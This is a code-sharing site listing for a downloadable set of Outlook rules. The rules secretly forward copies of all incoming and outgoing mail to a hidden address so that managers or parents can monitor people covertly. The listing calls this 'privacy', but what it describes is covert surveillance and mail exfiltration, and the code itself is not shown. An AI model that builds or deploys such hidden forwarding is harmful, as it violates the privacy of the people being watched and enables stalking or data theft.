winzip icon

Outlook rules to impove e-mail privacy

Submitted on: 11/19/2019 3:00:12 PM
By: STC Reseller 
Level: Beginner
User Rating: Unrated
Compatibility: VB 6.0
Views: 2083
author picture
     Outlook rules are precompiled set of commands, methods and instructions which allow you to move, flag, and respond to email messages automatically. You can also use rules to play sounds, move messages to folders, or display new item alerts. This article assumes that the user has basic knowledge on how e-mail messages work and also basic knowledge on how to use e-mail clients. Importing or creating rules in Outlook is very simple too. The rules inside of the archive made available within the post automates MS Outlook sends a secret copy of the message we receive and another copy of the sent message, to a secretly chosen address, which may be accesible to a manager or parent who is in need for his own firm's privacy or their own child on-line security. By using these rules, any mail message transacted by an employee or a child is fully monitored to the seak of security both of a firm (regarding the employee, whose email sending and receiving operations the manager may be interested in) and of a child/family privacy (regarding a parent). Note that these rules send the copies of the received and/or sent message before the employee (as a traitor) or the child (who may neglect protecting his own person's and family's privacy) could delete it. The rules work on Microsoft Outlook 2007 and above. Please modify the rules by changing the recipiend address you need the messages to be secretly sent sent. The ready-for-use rules, as an VBA interpreter output, are available here:
winzip iconDownload code

Note: Due to the size or complexity of this submission, the author has submitted it as a .zip file to shorten your download time. Afterdownloading it, you will need a program like Winzip to decompress it.Virus note:All files are scanned once-a-day by Planet Source Code for viruses, but new viruses come out every day, so no prevention program can catch 100% of them. For your own safety, please:
  1. Re-scan downloaded files using your personal virus checker before using it.
  2. NEVER, EVER run compiled files (.exe's, .ocx's, .dll's etc.)--only run source code.
  3. Scan the source code with Minnow's Project Scanner

If you don't have a virus scanner, you can get one at many places on the net

Report Bad Submission
Use this form to tell us if this entry should be deleted (i.e contains no code, is a virus, etc.).
This submission should be removed because:

Your Vote

What do you think of this code (in the Beginner category)?
(The code with your highest vote will win this month's coding contest!)
Excellent  Good  Average  Below Average  Poor (See voting log ...)

Other User Comments

 There are no comments on this submission.

Add Your Feedback
Your feedback will be posted below and an email sent to the author. Please remember that the author was kind enough to share this with you, so any criticisms must be stated politely, or they will be deleted. (For feedback not related to this particular code, please click here instead.)

To post feedback, first please login.